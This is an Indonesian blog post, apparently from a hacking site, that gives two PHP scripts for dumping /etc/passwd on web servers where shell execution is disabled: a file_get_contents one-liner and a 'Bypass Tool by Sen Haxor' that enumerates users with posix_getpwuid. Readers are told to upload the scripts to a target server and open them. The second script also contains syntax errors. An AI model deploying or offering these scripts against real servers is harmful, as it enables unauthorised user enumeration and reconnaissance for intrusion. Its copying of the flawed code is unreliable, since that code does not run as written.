Alternatif Bypass Symlink / Jumping ” /etc/passwd “

Kali ini saya akan membagi 2 cara yang saya temukan di Google, khususnya yang berkaitan dengan melihat list user yang terdapat pada database. Terkadang ada beberapa server yang mendisable fungsi “shell executable“, sehingga perintah “cat /etc/passwd” tidak akan berjalan. Untuk itu, dibawah ini saya akan membagi 2 alternatif yang saya temukan di Google yang biasa saya pakai
Tanpa banyak bicara lagi, dikarenakan ini juga dari hasil Googling.
  1. Alternatif yang pertama ialah dengan menggunakan perintah “file_get_contents“Tanya kenapa?
    Hal ini dikarenakan pada server tersebut atau kebanyakan server sekarang, yang didisable adalah fungsi “shell executable“, sedangkan pada alternatif ini kita menggunakan fungsi php, yang dimana masih berjalan pada server tersebut.
    Untuk melihat isi dari file “/etc/passwd“, kita harus membuat sebuah script php yang didalamnya terdapat fungsi “file_get_contents“.
    Berikut scriptnya:
    1
    2
    3
    <?php
    echo file_get_contents('/etc/passwd');
    ?>
    Simpan script diatas dengan ekstensi php, kemudian upload ke server yang ingin kamu lihat list usernya. Setelah itu buka file ini di direktori hasil upload yang tadi kamu lakukan (misalnya kamu menyimpan dan mengupload dengan nama aa.php. Kemudian untuk melihat hasilnya, kamu pergi ke hasil upload tadi. Contoh: www.situs.com/aa.php). Nanti pada halaman ini akan terlihat isi dari file “/etc/passwd“.
  2. Alternatif yang kedua adalah dengan menggunakan script yang dibuat oleh Sen Haxor dengan menggunakan fungsi “posix_getpwuid” untuk memanggil file “etc/passwd
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    <title>Etc/Passwd Bypass Tool by Sen Haxor</title>
    <body background="#fff">
    <form>
    <p align="center" dir="rtl"><font color="#008080">
    <font color="red" face="Tahoma"><h1>/etc/passwd Bypasser By Sen Haxor</h1></font></a></font><font color="red">
    <font color="red"><span lang="ar-sa">
    </form>
    <form>
    <td width="50%"><font color="black"><?php echo 'Server IP :<b>'.$_SERVER["SERVER_ADDR"].'</b>';?></font></td>
    <td width="50%"><select size="1" name="plugin"><option value="plugin">/etc/passwd</option></option></select></td>
    <td width="100%" colspan="2">
    <p align="center"><input type="submit" value="Submit"></td>
    </form>
    <textarea method='POST'  rows=20 cols=100 wrap=off>
    <?php
    error_reporting(0);
     if ($_GET['plugin'] )
    for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
    $ara = posix_getpwuid($uid);
    if (!empty($ara)) {
    while (list ($key$val) = each($ara)){
    print "$val:";
    }
    print "n";
    }
    }
    echo "</textarea>";
    ?>
    Simpan script ini dan upload ke server yang kamu punya, kemudian klik submit untuk melihat isi dari file “/etc/passwd.
    Screenshoot:

Itulah tadi 2 alternatif jika fungsi shell_exec didisable oleh server, sehingga kita tidak bisa menggunakan perintah “cat /etc/passwd” untuk melihat list user dalam sebuah server.
Fungsi “file_get_contents” diatas juga bisa dilakukan untuk memanggil file lain, entah berupa gambar atau seluruh halaman web, tinggal dikembangkan saja. Semoga 2 hal tadi bermanfaat bagi kita semua, dan maaf kalau ada salah bahasa, soalnya saya cuma baca-baca di Google juga.

Previous
Next Post »
0 Komentar